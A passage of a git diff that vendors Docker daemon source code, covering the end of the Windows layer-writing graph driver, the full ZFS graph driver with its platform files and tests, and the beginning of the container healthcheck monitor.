mutatedFiles[hdr.Name]; ok { + bcdBackup, err = os.Create(filepath.Join(root, backupPath)) + if err != nil { + return nil, err + } + defer func() { + cerr := bcdBackup.Close() + if err == nil { + err = cerr + } + }() + + bcdBackupWriter = winio.NewBackupFileWriter(bcdBackup, false) + defer func() { + cerr := bcdBackupWriter.Close() + if err == nil { + err = cerr + } + }() + + buf.Reset(io.MultiWriter(w, bcdBackupWriter)) + } else { + buf.Reset(w) + } + + defer func() { + ferr := buf.Flush() + if err == nil { + err = ferr + } + }() + + return backuptar.WriteBackupStreamFromTarFile(buf, t, hdr) +} + +func writeLayerFromTar(r io.Reader, w hcsshim.LayerWriter, root string) (int64, error) { + t := tar.NewReader(r) + hdr, err := t.Next() + totalSize := int64(0) + buf := bufio.NewWriter(nil) + for err == nil { + base := path.Base(hdr.Name) + if strings.HasPrefix(base, archive.WhiteoutPrefix) { + name := path.Join(path.Dir(hdr.Name), base[len(archive.WhiteoutPrefix):]) + err = w.Remove(filepath.FromSlash(name)) + if err != nil { + return 0, err + } + hdr, err = t.Next() + } else if hdr.Typeflag == tar.TypeLink { + err = w.AddLink(filepath.FromSlash(hdr.Name), filepath.FromSlash(hdr.Linkname)) + if err != nil { + return 0, err + } + hdr, err = t.Next() + } else { + var ( + name string + size int64 + fileInfo *winio.FileBasicInfo + ) + name, size, fileInfo, err = backuptar.FileInfoFromHeader(hdr) + if err != nil { + return 0, err + } + err = w.Add(filepath.FromSlash(name), fileInfo) + if err != nil { + return 0, err + } + hdr, err = writeBackupStreamFromTarAndSaveMutatedFiles(buf, w, t, hdr, root) + totalSize += size + } + } + if err != io.EOF { + return 0, err + } + return totalSize, nil +} + +// importLayer adds a new layer to the tag and graph store based on the given data. +func (d *Driver) importLayer(id string, layerData io.Reader, parentLayerPaths []string) (size int64, err error) { + if !noreexec { + cmd := reexec.Command(append([]string{"docker-windows-write-layer", d.info.HomeDir, id}, parentLayerPaths...)...) + output := bytes.NewBuffer(nil) + cmd.Stdin = layerData + cmd.Stdout = output + cmd.Stderr = output + + if err = cmd.Start(); err != nil { + return + } + + if err = cmd.Wait(); err != nil { + return 0, fmt.Errorf("re-exec error: %v: output: %s", err, output) + } + + return strconv.ParseInt(output.String(), 10, 64) + } + return writeLayer(layerData, d.info.HomeDir, id, parentLayerPaths...) +} + +// writeLayerReexec is the re-exec entry point for writing a layer from a tar file +func writeLayerReexec() { + size, err := writeLayer(os.Stdin, os.Args[1], os.Args[2], os.Args[3:]...) + if err != nil { + fmt.Fprint(os.Stderr, err) + os.Exit(1) + } + fmt.Fprint(os.Stdout, size) +} + +// writeLayer writes a layer from a tar file. +func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) { + err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}) + if err != nil { + return 0, err + } + if noreexec { + defer func() { + if err := winio.DisableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}); err != nil { + // This should never happen, but just in case when in debugging mode. + // See https://github.com/docker/docker/pull/28002#discussion_r86259241 for rationale. + panic("Failed to disabled process privileges while in non re-exec mode") + } + }() + } + + info := hcsshim.DriverInfo{ + Flavour: filterDriver, + HomeDir: home, + } + + w, err := hcsshim.NewLayerWriter(info, id, parentLayerPaths) + if err != nil { + return 0, err + } + + size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id)) + if err != nil { + return 0, err + } + + err = w.Close() + if err != nil { + return 0, err + } + + return size, nil +} + +// resolveID computes the layerID information based on the given id. +func (d *Driver) resolveID(id string) (string, error) { + content, err := ioutil.ReadFile(filepath.Join(d.dir(id), "layerID")) + if os.IsNotExist(err) { + return id, nil + } else if err != nil { + return "", err + } + return string(content), nil +} + +// setID stores the layerId in disk. +func (d *Driver) setID(id, altID string) error { + err := ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600) + if err != nil { + return err + } + return nil +} + +// getLayerChain returns the layer chain information. +func (d *Driver) getLayerChain(id string) ([]string, error) { + jPath := filepath.Join(d.dir(id), "layerchain.json") + content, err := ioutil.ReadFile(jPath) + if os.IsNotExist(err) { + return nil, nil + } else if err != nil { + return nil, fmt.Errorf("Unable to read layerchain file - %s", err) + } + + var layerChain []string + err = json.Unmarshal(content, &layerChain) + if err != nil { + return nil, fmt.Errorf("Failed to unmarshall layerchain json - %s", err) + } + + return layerChain, nil +} + +// setLayerChain stores the layer chain information in disk. +func (d *Driver) setLayerChain(id string, chain []string) error { + content, err := json.Marshal(&chain) + if err != nil { + return fmt.Errorf("Failed to marshall layerchain json - %s", err) + } + + jPath := filepath.Join(d.dir(id), "layerchain.json") + err = ioutil.WriteFile(jPath, content, 0600) + if err != nil { + return fmt.Errorf("Unable to write layerchain file - %s", err) + } + + return nil +} + +type fileGetCloserWithBackupPrivileges struct { + path string +} + +func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser, error) { + if backupPath, ok := mutatedFiles[filename]; ok { + return os.Open(filepath.Join(fg.path, backupPath)) + } + + var f *os.File + // Open the file while holding the Windows backup privilege. This ensures that the + // file can be opened even if the caller does not actually have access to it according + // to the security descriptor. + err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { + path := longpath.AddPrefix(filepath.Join(fg.path, filename)) + p, err := syscall.UTF16FromString(path) + if err != nil { + return err + } + h, err := syscall.CreateFile(&p[0], syscall.GENERIC_READ, syscall.FILE_SHARE_READ, nil, syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + if err != nil { + return &os.PathError{Op: "open", Path: path, Err: err} + } + f = os.NewFile(uintptr(h), path) + return nil + }) + return f, err +} + +func (fg *fileGetCloserWithBackupPrivileges) Close() error { + return nil +} + +// DiffGetter returns a FileGetCloser that can read files from the directory that +// contains files for the layer differences. Used for direct access for tar-split. +func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + id, err := d.resolveID(id) + if err != nil { + return nil, err + } + + return &fileGetCloserWithBackupPrivileges{d.dir(id)}, nil +} + +type storageOptions struct { + size uint64 +} + +func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) { + options := storageOptions{} + + // Read size to change the block device size per container. + for key, val := range storageOpt { + key := strings.ToLower(key) + switch key { + case "size": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + options.size = uint64(size) + default: + return nil, fmt.Errorf("Unknown storage option: %s", key) + } + } + return &options, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS new file mode 100644 index 0000000000..9c270c541f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS @@ -0,0 +1,2 @@ +Jörg Thalheim (@Mic92) +Arthur Gautier (@baloose) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go new file mode 100644 index 0000000000..8e283ccf40 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go @@ -0,0 +1,417 @@ +// +build linux freebsd solaris + +package zfs + +import ( + "fmt" + "os" + "os/exec" + "path" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + zfs "github.com/mistifyio/go-zfs" + "github.com/opencontainers/runc/libcontainer/label" +) + +type zfsOptions struct { + fsName string + mountPath string +} + +func init() { + graphdriver.Register("zfs", Init) +} + +// Logger returns a zfs logger implementation. +type Logger struct{} + +// Log wraps log message from ZFS driver with a prefix '[zfs]'. +func (*Logger) Log(cmd []string) { + logrus.Debugf("[zfs] %s", strings.Join(cmd, " ")) +} + +// Init returns a new ZFS driver. +// It takes base mount path and an array of options which are represented as key value pairs. +// Each option is in the for key=value. 'zfs.fsname' is expected to be a valid key in the options. +func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + var err error + + if _, err := exec.LookPath("zfs"); err != nil { + logrus.Debugf("[zfs] zfs command is not available: %v", err) + return nil, graphdriver.ErrPrerequisites + } + + file, err := os.OpenFile("/dev/zfs", os.O_RDWR, 600) + if err != nil { + logrus.Debugf("[zfs] cannot open /dev/zfs: %v", err) + return nil, graphdriver.ErrPrerequisites + } + defer file.Close() + + options, err := parseOptions(opt) + if err != nil { + return nil, err + } + options.mountPath = base + + rootdir := path.Dir(base) + + if options.fsName == "" { + err = checkRootdirFs(rootdir) + if err != nil { + return nil, err + } + } + + if options.fsName == "" { + options.fsName, err = lookupZfsDataset(rootdir) + if err != nil { + return nil, err + } + } + + zfs.SetLogger(new(Logger)) + + filesystems, err := zfs.Filesystems(options.fsName) + if err != nil { + return nil, fmt.Errorf("Cannot find root filesystem %s: %v", options.fsName, err) + } + + filesystemsCache := make(map[string]bool, len(filesystems)) + var rootDataset *zfs.Dataset + for _, fs := range filesystems { + if fs.Name == options.fsName { + rootDataset = fs + } + filesystemsCache[fs.Name] = true + } + + if rootDataset == nil { + return nil, fmt.Errorf("BUG: zfs get all -t filesystem -rHp '%s' should contain '%s'", options.fsName, options.fsName) + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, fmt.Errorf("Failed to get root uid/guid: %v", err) + } + if err := idtools.MkdirAllAs(base, 0700, rootUID, rootGID); err != nil { + return nil, fmt.Errorf("Failed to create '%s': %v", base, err) + } + + if err := mount.MakePrivate(base); err != nil { + return nil, err + } + d := &Driver{ + dataset: rootDataset, + options: options, + filesystemsCache: filesystemsCache, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()), + } + return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil +} + +func parseOptions(opt []string) (zfsOptions, error) { + var options zfsOptions + options.fsName = "" + for _, option := range opt { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return options, err + } + key = strings.ToLower(key) + switch key { + case "zfs.fsname": + options.fsName = val + default: + return options, fmt.Errorf("Unknown option %s", key) + } + } + return options, nil +} + +func lookupZfsDataset(rootdir string) (string, error) { + var stat syscall.Stat_t + if err := syscall.Stat(rootdir, &stat); err != nil { + return "", fmt.Errorf("Failed to access '%s': %s", rootdir, err) + } + wantedDev := stat.Dev + + mounts, err := mount.GetMounts() + if err != nil { + return "", err + } + for _, m := range mounts { + if err := syscall.Stat(m.Mountpoint, &stat); err != nil { + logrus.Debugf("[zfs] failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err) + continue // may fail on fuse file systems + } + + if stat.Dev == wantedDev && m.Fstype == "zfs" { + return m.Source, nil + } + } + + return "", fmt.Errorf("Failed to find zfs dataset mounted on '%s' in /proc/mounts", rootdir) +} + +// Driver holds information about the driver, such as zfs dataset, options and cache. +type Driver struct { + dataset *zfs.Dataset + options zfsOptions + sync.Mutex // protects filesystem cache against concurrent access + filesystemsCache map[string]bool + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter +} + +func (d *Driver) String() string { + return "zfs" +} + +// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver. +func (d *Driver) Cleanup() error { + return nil +} + +// Status returns information about the ZFS filesystem. It returns a two dimensional array of information +// such as pool name, dataset name, disk usage, parent quota and compression used. +// Currently it return 'Zpool', 'Zpool Health', 'Parent Dataset', 'Space Used By Parent', +// 'Space Available', 'Parent Quota' and 'Compression'. +func (d *Driver) Status() [][2]string { + parts := strings.Split(d.dataset.Name, "/") + pool, err := zfs.GetZpool(parts[0]) + + var poolName, poolHealth string + if err == nil { + poolName = pool.Name + poolHealth = pool.Health + } else { + poolName = fmt.Sprintf("error while getting pool information %v", err) + poolHealth = "not available" + } + + quota := "no" + if d.dataset.Quota != 0 { + quota = strconv.FormatUint(d.dataset.Quota, 10) + } + + return [][2]string{ + {"Zpool", poolName}, + {"Zpool Health", poolHealth}, + {"Parent Dataset", d.dataset.Name}, + {"Space Used By Parent", strconv.FormatUint(d.dataset.Used, 10)}, + {"Space Available", strconv.FormatUint(d.dataset.Avail, 10)}, + {"Parent Quota", quota}, + {"Compression", d.dataset.Compression}, + } +} + +// GetMetadata returns image/container metadata related to graph driver +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +func (d *Driver) cloneFilesystem(name, parentName string) error { + snapshotName := fmt.Sprintf("%d", time.Now().Nanosecond()) + parentDataset := zfs.Dataset{Name: parentName} + snapshot, err := parentDataset.Snapshot(snapshotName /*recursive */, false) + if err != nil { + return err + } + + _, err = snapshot.Clone(name, map[string]string{"mountpoint": "legacy"}) + if err == nil { + d.Lock() + d.filesystemsCache[name] = true + d.Unlock() + } + + if err != nil { + snapshot.Destroy(zfs.DestroyDeferDeletion) + return err + } + return snapshot.Destroy(zfs.DestroyDeferDeletion) +} + +func (d *Driver) zfsPath(id string) string { + return d.options.fsName + "/" + id +} + +func (d *Driver) mountPath(id string) string { + return path.Join(d.options.mountPath, "graph", getMountpoint(id)) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create prepares the dataset and filesystem for the ZFS driver for the given id under the parent. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + var storageOpt map[string]string + if opts != nil { + storageOpt = opts.StorageOpt + } + + err := d.create(id, parent, storageOpt) + if err == nil { + return nil + } + if zfsError, ok := err.(*zfs.Error); ok { + if !strings.HasSuffix(zfsError.Stderr, "dataset already exists\n") { + return err + } + // aborted build -> cleanup + } else { + return err + } + + dataset := zfs.Dataset{Name: d.zfsPath(id)} + if err := dataset.Destroy(zfs.DestroyRecursiveClones); err != nil { + return err + } + + // retry + return d.create(id, parent, storageOpt) +} + +func (d *Driver) create(id, parent string, storageOpt map[string]string) error { + name := d.zfsPath(id) + quota, err := parseStorageOpt(storageOpt) + if err != nil { + return err + } + if parent == "" { + mountoptions := map[string]string{"mountpoint": "legacy"} + fs, err := zfs.CreateFilesystem(name, mountoptions) + if err == nil { + err = setQuota(name, quota) + if err == nil { + d.Lock() + d.filesystemsCache[fs.Name] = true + d.Unlock() + } + } + return err + } + err = d.cloneFilesystem(name, d.zfsPath(parent)) + if err == nil { + err = setQuota(name, quota) + } + return err +} + +func parseStorageOpt(storageOpt map[string]string) (string, error) { + // Read size to change the disk quota per container + for k, v := range storageOpt { + key := strings.ToLower(k) + switch key { + case "size": + return v, nil + default: + return "0", fmt.Errorf("Unknown option %s", key) + } + } + return "0", nil +} + +func setQuota(name string, quota string) error { + if quota == "0" { + return nil + } + fs, err := zfs.GetDataset(name) + if err != nil { + return err + } + return fs.SetProperty("quota", quota) +} + +// Remove deletes the dataset, filesystem and the cache for the given id. +func (d *Driver) Remove(id string) error { + name := d.zfsPath(id) + dataset := zfs.Dataset{Name: name} + err := dataset.Destroy(zfs.DestroyRecursive) + if err == nil { + d.Lock() + delete(d.filesystemsCache, name) + d.Unlock() + } + return err +} + +// Get returns the mountpoint for the given id after creating the target directories if necessary. +func (d *Driver) Get(id, mountLabel string) (string, error) { + mountpoint := d.mountPath(id) + if count := d.ctr.Increment(mountpoint); count > 1 { + return mountpoint, nil + } + + filesystem := d.zfsPath(id) + options := label.FormatMountLabel("", mountLabel) + logrus.Debugf(`[zfs] mount("%s", "%s", "%s")`, filesystem, mountpoint, options) + + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + d.ctr.Decrement(mountpoint) + return "", err + } + // Create the target directories if they don't exist + if err := idtools.MkdirAllAs(mountpoint, 0755, rootUID, rootGID); err != nil { + d.ctr.Decrement(mountpoint) + return "", err + } + + if err := mount.Mount(filesystem, mountpoint, "zfs", options); err != nil { + d.ctr.Decrement(mountpoint) + return "", fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err) + } + + // this could be our first mount after creation of the filesystem, and the root dir may still have root + // permissions instead of the remapped root uid:gid (if user namespaces are enabled): + if err := os.Chown(mountpoint, rootUID, rootGID); err != nil { + mount.Unmount(mountpoint) + d.ctr.Decrement(mountpoint) + return "", fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err) + } + + return mountpoint, nil +} + +// Put removes the existing mountpoint for the given id if it exists. +func (d *Driver) Put(id string) error { + mountpoint := d.mountPath(id) + if count := d.ctr.Decrement(mountpoint); count > 0 { + return nil + } + mounted, err := graphdriver.Mounted(graphdriver.FsMagicZfs, mountpoint) + if err != nil || !mounted { + return err + } + + logrus.Debugf(`[zfs] unmount("%s")`, mountpoint) + + if err := mount.Unmount(mountpoint); err != nil { + return fmt.Errorf("error unmounting to %s: %v", mountpoint, err) + } + return nil +} + +// Exists checks to see if the cache entry exists for the given id. +func (d *Driver) Exists(id string) bool { + d.Lock() + defer d.Unlock() + return d.filesystemsCache[d.zfsPath(id)] == true +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go new file mode 100644 index 0000000000..1c05fa794c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go @@ -0,0 +1,38 @@ +package zfs + +import ( + "fmt" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" +) + +func checkRootdirFs(rootdir string) error { + var buf syscall.Statfs_t + if err := syscall.Statfs(rootdir, &buf); err != nil { + return fmt.Errorf("Failed to access '%s': %s", rootdir, err) + } + + // on FreeBSD buf.Fstypename contains ['z', 'f', 's', 0 ... ] + if (buf.Fstypename[0] != 122) || (buf.Fstypename[1] != 102) || (buf.Fstypename[2] != 115) || (buf.Fstypename[3] != 0) { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + return graphdriver.ErrPrerequisites + } + + return nil +} + +func getMountpoint(id string) string { + maxlen := 12 + + // we need to preserve filesystem suffix + suffix := strings.SplitN(id, "-", 2) + + if len(suffix) > 1 { + return id[:maxlen] + "-" + suffix[1] + } + + return id[:maxlen] +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go new file mode 100644 index 0000000000..52ed516049 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go @@ -0,0 +1,27 @@ +package zfs + +import ( + "fmt" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" +) + +func checkRootdirFs(rootdir string) error { + var buf syscall.Statfs_t + if err := syscall.Statfs(rootdir, &buf); err != nil { + return fmt.Errorf("Failed to access '%s': %s", rootdir, err) + } + + if graphdriver.FsMagic(buf.Type) != graphdriver.FsMagicZfs { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + return graphdriver.ErrPrerequisites + } + + return nil +} + +func getMountpoint(id string) string { + return id +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go new file mode 100644 index 0000000000..bb4a85bd64 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go @@ -0,0 +1,59 @@ +// +build solaris,cgo + +package zfs + +/* +#include +#include + +static inline struct statvfs *getstatfs(char *s) { + struct statvfs *buf; + int err; + buf = (struct statvfs *)malloc(sizeof(struct statvfs)); + err = statvfs(s, buf); + return buf; +} +*/ +import "C" +import ( + "path/filepath" + "strings" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" +) + +func checkRootdirFs(rootdir string) error { + + cs := C.CString(filepath.Dir(rootdir)) + buf := C.getstatfs(cs) + + // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ] + if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || + (buf.f_basetype[3] != 0) { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + C.free(unsafe.Pointer(buf)) + return graphdriver.ErrPrerequisites + } + + C.free(unsafe.Pointer(buf)) + C.free(unsafe.Pointer(cs)) + return nil +} + +/* rootfs is introduced to comply with the OCI spec +which states that root filesystem must be mounted at /rootfs/ instead of / +*/ +func getMountpoint(id string) string { + maxlen := 12 + + // we need to preserve filesystem suffix + suffix := strings.SplitN(id, "-", 2) + + if len(suffix) > 1 { + return filepath.Join(id[:maxlen]+"-"+suffix[1], "rootfs", "root") + } + + return filepath.Join(id[:maxlen], "rootfs", "root") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go new file mode 100644 index 0000000000..3e22928438 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go @@ -0,0 +1,35 @@ +// +build linux + +package zfs + +import ( + "testing" + + "github.com/docker/docker/daemon/graphdriver/graphtest" +) + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestZfsSetup and TestZfsTeardown +func TestZfsSetup(t *testing.T) { + graphtest.GetDriver(t, "zfs") +} + +func TestZfsCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "zfs") +} + +func TestZfsCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "zfs") +} + +func TestZfsCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "zfs") +} + +func TestZfsSetQuota(t *testing.T) { + graphtest.DriverTestSetQuota(t, "zfs") +} + +func TestZfsTeardown(t *testing.T) { + graphtest.PutDriver(t) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go new file mode 100644 index 0000000000..ce8daadaf6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go @@ -0,0 +1,11 @@ +// +build !linux,!freebsd,!solaris + +package zfs + +func checkRootdirFs(rootdir string) error { + return nil +} + +func getMountpoint(id string) string { + return id +} diff --git a/vendor/github.com/docker/docker/daemon/health.go b/vendor/github.com/docker/docker/daemon/health.go new file mode 100644 index 0000000000..5b01dc0f40 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/health.go @@ -0,0 +1,341 @@ +package daemon + +import ( + "bytes" + "fmt" + "runtime" + "strings" + "sync" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +const ( + // Longest healthcheck probe output message to store. Longer messages will be truncated. + maxOutputLen = 4096 + + // Default interval between probe runs (from the end of the first to the start of the second). + // Also the time before the first probe. + defaultProbeInterval = 30 * time.Second + + // The maximum length of time a single probe run should take. If the probe takes longer + // than this, the check is considered to have failed. + defaultProbeTimeout = 30 * time.Second + + // Default number of consecutive failures of the health check + // for the container to be considered unhealthy. + defaultProbeRetries = 3 + + // Maximum number of entries to record + maxLogEntries = 5 +) + +const ( + // Exit status codes that can be returned by the probe command. + + exitStatusHealthy = 0 // Container is healthy + exitStatusUnhealthy = 1 // Container is unhealthy +) + +// probe implementations know how to run a particular type of probe. +type probe interface { + // Perform one run of the check. Returns the exit code and an optional + // short diagnostic string. + run(context.Context, *Daemon, *container.Container) (*types.HealthcheckResult, error) +} + +// cmdProbe implements the "CMD" probe type. +type cmdProbe struct { + // Run the command with the system's default shell instead of execing it directly. + shell bool +} + +// exec the healthcheck command in the container. +// Returns the exit code and probe output (if any) +func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Container) (*types.HealthcheckResult, error) { + + cmdSlice := strslice.StrSlice(container.Config.Healthcheck.Test)[1:] + if p.shell { + cmdSlice = append(getShell(container.Config), cmdSlice...) + } + entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmdSlice) + execConfig := exec.NewConfig() + execConfig.OpenStdin = false + execConfig.OpenStdout = true + execConfig.OpenStderr = true + execConfig.ContainerID = container.ID + execConfig.DetachKeys = []byte{} + execConfig.Entrypoint = entrypoint + execConfig.Args = args + execConfig.Tty = false + execConfig.Privileged = false + execConfig.User = container.Config.User + + d.registerExecCommand(container, execConfig) + d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + + output := &limitedBuffer{} + err := d.ContainerExecStart(ctx, execConfig.ID, nil, output, output) + if err != nil { + return nil, err + } + info, err := d.getExecConfig(execConfig.ID) + if err != nil { + return nil, err + } + if info.ExitCode == nil { + return nil, fmt.Errorf("Healthcheck for container %s has no exit code!", container.ID) + } + // Note: Go's json package will handle invalid UTF-8 for us + out := output.String() + return &types.HealthcheckResult{ + End: time.Now(), + ExitCode: *info.ExitCode, + Output: out, + }, nil +} + +// Update the container's Status.Health struct based on the latest probe's result. +func handleProbeResult(d *Daemon, c *container.Container, result *types.HealthcheckResult, done chan struct{}) { + c.Lock() + defer c.Unlock() + + // probe may have been cancelled while waiting on lock. Ignore result then + select { + case <-done: + return + default: + } + + retries := c.Config.Healthcheck.Retries + if retries <= 0 { + retries = defaultProbeRetries + } + + h := c.State.Health + oldStatus := h.Status + + if len(h.Log) >= maxLogEntries { + h.Log = append(h.Log[len(h.Log)+1-maxLogEntries:], result) + } else { + h.Log = append(h.Log, result) + } + + if result.ExitCode == exitStatusHealthy { + h.FailingStreak = 0 + h.Status = types.Healthy + } else { + // Failure (including invalid exit code) + h.FailingStreak++ + if h.FailingStreak >= retries { + h.Status = types.Unhealthy + } + // Else we're starting or healthy. Stay in that state. + } + + if oldStatus != h.Status { + d.LogContainerEvent(c, "health_status: "+h.Status) + } +} + +// Run the container's monitoring thread until notified via "stop". +// There is never more than one monitor thread running per container at a time. +func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe) { + probeTimeout := timeoutWithDefault(c.Config.Healthcheck.Timeout, defaultProbeTimeout) + probeInterval := timeoutWithDefault(c.Config.Healthcheck.Interval, defaultProbeInterval) + for { + select { + case <-stop: + logrus.Debugf("Stop healthcheck monitoring for container %s (received while idle)", c.ID) + return + case <-time.After(probeInterval): + logrus.Debugf("Running health check for container %s ...", c.ID) + startTime := time.Now() + ctx, cancelProbe := context.WithTimeout(context.Background(), probeTimeout) + results := make(chan *types.HealthcheckResult) + go func() { + healthChecksCounter.Inc() + result, err := probe.run(ctx, d, c) + if err != nil { + healthChecksFailedCounter.Inc() + logrus.Warnf("Health check for container %s error: %v", c.ID, err) + results <- &types.HealthcheckResult{ + ExitCode: -1, + Output: err.Error(), + Start: startTime, + End: time.Now(), + } + } else { + result.Start = startTime + logrus.Debugf("Health check for container %s done (exitCode=%d)", c.ID, result.ExitCode) + results <- result + } + close(results) + }() + select { + case <-stop: + logrus.Debugf("Stop healthcheck monitoring for container %s (received while probing)", c.ID) + // Stop timeout and kill probe, but don't wait for probe to exit. + cancelProbe() + return + case result := <-results: + handleProbeResult(d, c, result, stop) + // Stop timeout + cancelProbe() + case <-ctx.Done(): + logrus.Debugf("Health check for container %s taking too long", c.ID) + handleProbeResult(d, c, &types.HealthcheckResult{ + ExitCode: -1, + Output: fmt.Sprintf("Health check exceeded timeout (%v)", probeTimeout), + Start: startTime, + End: time.Now(), + }, stop) + cancelProbe() + // Wait for probe to exit (it might take a while to respond to the TERM + // signal and we don't want dying probes to pile up). + <-results + } + } + } +} + +// Get a suitable probe implementation for the container's healthcheck configuration. +// Nil will be returned if no healthcheck was configured or NONE was set. +func getProbe(c *container.Container) probe { + config := c.Config.Healthcheck + if config == nil || len(config.Test) == 0 { + return nil + } + switch config.Test[0] { + case "CMD": + return &cmdProbe{shell: false} + case "CMD-SHELL": + return &cmdProbe{shell: true} + default: + logrus.Warnf("Unknown healthcheck type '%s' (expected 'CMD') in container %s", config.Test[0], c.ID) + return nil + } +} + +// Ensure the health-check monitor is running or not, depending on the current +// state of the container. +// Called from monitor.go, with c locked. +func (d *Daemon) updateHealthMonitor(c *container.Container) { + h := c.State.Health + if h == nil { + return // No healthcheck configured + } + + probe := getProbe(c) + wantRunning := c.Running && !c.Paused && probe != nil + if wantRunning { + if stop := h.OpenMonitorChannel(); stop != nil { + go monitor(d, c, stop, probe) + } + } else { + h.CloseMonitorChannel() + } +} + +// Reset the health state for a newly-started, restarted or restored container. +// initHealthMonitor is called from monitor.go and we should never be running +// two instances at once. +// Called with c locked. +func (d *Daemon) initHealthMonitor(c *container.Container) { + // If no healthcheck is setup then don't init the monitor + if getProbe(c) == nil { + return + } + + // This is needed in case we're auto-restarting + d.stopHealthchecks(c) + + if h := c.State.Health; h != nil { + h.Status = types.Starting + h.FailingStreak = 0 + } else { + h := &container.Health{} + h.Status = types.Starting + c.State.Health = h + } + + d.updateHealthMonitor(c) +} + +// Called when the container is being stopped (whether because the health check is +// failing or for any other reason). +func (d *Daemon) stopHealthchecks(c *container.Container) { + h := c.State.Health + if h != nil { + h.CloseMonitorChannel() + } +} + +// Buffer up to maxOutputLen bytes. Further data is discarded. +type limitedBuffer struct { + buf bytes.Buffer + mu sync.Mutex + truncated bool // indicates that data has been lost +} + +// Append to limitedBuffer while there is room. +func (b *limitedBuffer) Write(data []byte) (int, 